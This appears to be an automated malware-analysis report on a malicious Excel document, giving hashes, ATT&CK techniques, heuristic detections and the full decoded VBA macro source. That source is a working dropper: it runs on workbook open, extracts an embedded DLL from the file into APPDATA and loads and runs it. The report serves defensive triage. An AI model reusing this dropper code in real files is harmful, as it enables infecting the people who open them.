Office (OLE) malware analysis — malicious · b72fcae5fec64cfb

MALICIOUS

Office (OLE)

274.5 KB Created: 2019-08-30 09:14:50 Authoring application: Microsoft Excel First seen: 2019-12-09

MD5: d53f4e5bdba3f109f76f8c09f821634e SHA-1: 6e66c91851b9be02cce8f693e35ef733376fab15 SHA-256: b72fcae5fec64cfb486af89b8a1cfd1f13779c11d57882249b257eb932c778b3

396 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file is an Excel document containing VBA macros that trigger on Workbook_Open. These macros reference API calls like VirtualAlloc and LoadLibrary, and critically, they execute an embedded PE executable. The presence of a Workbook_Open macro, an embedded executable, and the 'Password-protected archive handoff' heuristic strongly suggests this is a downloader or droppper malware.

Heuristics 11

ClamAV: Xls.Malware.Sdrop-7173293-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Sdrop-7173293-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER

The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not — the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

        Set oApp = CreateObject("Shell.Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
UserForm2.TextBox1.Tag = Environ("TEMP")
UserForm2.TextBox2.Tag = Environ("APPDATA")
```
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6849 bytes
SHA-256: `4dbc703db97734b4e00edaee6cdc8d24ee25787cb2c2906b8c1d047fbfa2b0c0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wbO" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() ExecuteExcel4Macro "MESSAGE(False, ""Debug"")" UserForm2.TextBox1.Tag = Environ("TEMP") UserForm2.TextBox2.Tag = Environ("APPDATA") ChDir (Environ("TEMP")) UserForm1.show ExecuteExcel4Macro "MESSAGE(False, ""Debug"")" End Sub Attribute VB_Name = "Page1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" #If Win64 Then Public Declare PtrSafe Function Hadno Lib _ "map_studio2.dll" () As Integer Public Declare PtrSafe Function Hadno2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long #Else Public Declare Function Hadno2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long Public Declare Function Hadno Lib _ "map_studio1.dll" () As Integer #End If Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{9688D726-F8F3-42E5-95DB-41DDA01F5774}{9097DCB3-25ED-4B5D-B203-7BED2B68D464}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub Label1_Click() End Sub Private Sub UserForm_Activate() DoEvents ReplaceCurrentModule End Sub Private Sub UserForm_Initialize() Call SystemButtonSettings(Me, False) End Sub Attribute VB_Name = "Module2" Private Const GWL_STYLE = -16 Private Const WS_CAPTION = &HC00000 Private Const WS_SYSMENU = &H80000 #If VBA7 Then Private Declare PtrSafe Function GetWindowLong _ Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, _ ByVal nIndex As Long) As Long Private Declare PtrSafe Function SetWindowLong _ Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, _ ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Private Declare PtrSafe Function FindWindowA _ Lib "user32" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Private Declare PtrSafe Function DrawMenuBar _ Lib "user32" (ByVal hWnd As Long) As Long #Else Private Declare Function GetWindowLong _ Lib "user32" Alias "GetWindowLongA" ( _ ByVal hWnd As Long, ByVal nIndex As Long) As Long Private Declare Function SetWindowLong _ Lib "user32" Alias "SetWindowLongA" ( _ ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Private Declare Function FindWindowA _ Lib "user32" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Private Declare Function DrawMenuBar _ Lib "user32" (ByVal hWnd As Long) As Long #End If Public Sub SystemButtonSettings(frm As Object, show As Boolean) Dim windowStyle As Long Dim windowHandle As Long windowHandle = FindWindowA(vbNullString, frm.Caption) windowStyle = GetWindowLong(windowHandle, GWL_STYLE) If show = False Then SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU) Else SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU) End If DrawMenuBar (windowHandle) End Sub Public Sub KillArray(ParamArray PathList() As Variant) On Error Resume Next For Each Key In PathList Kill Key Next Key On Error GoTo 0 End Sub Public Sub Resoration(s As String, nm As String, fl As Long, num As Integer) Dim intFileNum As Long, bytTemp1 As Byte, bytTemp2 As Byte, bytTemp3 As Byte Dim DataArray() As Long ReDim DataArray(1 To fl) DataArray(1) = CByte(50 + 27) DataArray(2) = CByte(50 + 40) DataArray(3) = CByte(50 + 94) intFileNum = FreeFile Open s For Binary Access Read As intFileNum Dim cur As Integer cur = 1 Do While Not EOF(intFileNum) Get intFileNum, , bytTemp1 If bytTemp1 = DataArray(1) Then Get intFileNum, , bytTemp2 If bytTemp2 = DataArray(2) Then Get intFileNum, , bytTemp3 If bytTemp3 = DataArray(3) Then If cur = num Then For k = 4 To fl Get intFileNum, , bytTemp1 DataArray(k) = bytTemp1 Next k Exit Do Else cur = cur + 1 End If End If End If End If Loop Close intFileNum intFileNum = FreeFile Open nm For Binary Lock Read Write As #intFileNum For i = LBound(DataArray) To UBound(DataArray) Put #intFileNum, , CByte(DataArray(i)) Next i Close #intFileNum End Sub Attribute VB_Name = "Module3" Public Sub ReplaceCurrentModule() TempName = UserForm2.TextBox1.Tag & "\factory.xlsx" ZipName = TempName + ".zip" ZipFolder = UserForm2.TextBox1.Tag '& "\UnzTmp" Dim nm As String Dim size As Long Dim num As Integer #If Win64 Then nm = UserForm2.TextBox2.Tag + "\map_studio2.dll" size = 69120 num = 2 #Else nm = UserForm2.TextBox2.Tag + "\map_studio1.dll" size = 81920 num = 1 #End If KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm DoEvents ThisWorkbook.Sheets.Copy Application.DisplayAlerts = False ActiveWorkbook.SaveAs TempName, FileFormat:=51 DoEvents ActiveWorkbook.Close DoEvents FileCopy TempName, ZipName Set oApp = CreateObject("Shell.Application") oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin") Resoration ZipFolder + "\oleObject1.bin", nm, size, num ChDir (UserForm2.TextBox2.Tag) No_Hadno = Hadno2(nm) Hadno End Sub Attribute VB_Name = "UserForm2" Attribute VB_Base = "0{EF8EF5EC-9004-4B39-A6DB-0760F1F6EB90}{9EAC1FBD-72FE-4D2B-A066-0B666908883E}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False
`embedded_office_000032db.exe`	embedded-pe	Office MZ+PE at offset 0x32DB	268069 bytes
SHA-256: `ed275f0c52e842bc9184bc6d1373536d74bd9bfcd09121dfbf78b21e0c523be9`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved macro source contains an auto-exec entry point and execution/download terms.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: MBD00C8E2C3/Ole10Native	160261 bytes
SHA-256: `83cb4f7518bc0bffa0c0a2a3fc4b58b72f6d598e4983080501f86cf4fa924057`

Open this report in the interactive analyzer, or submit your own file for analysis.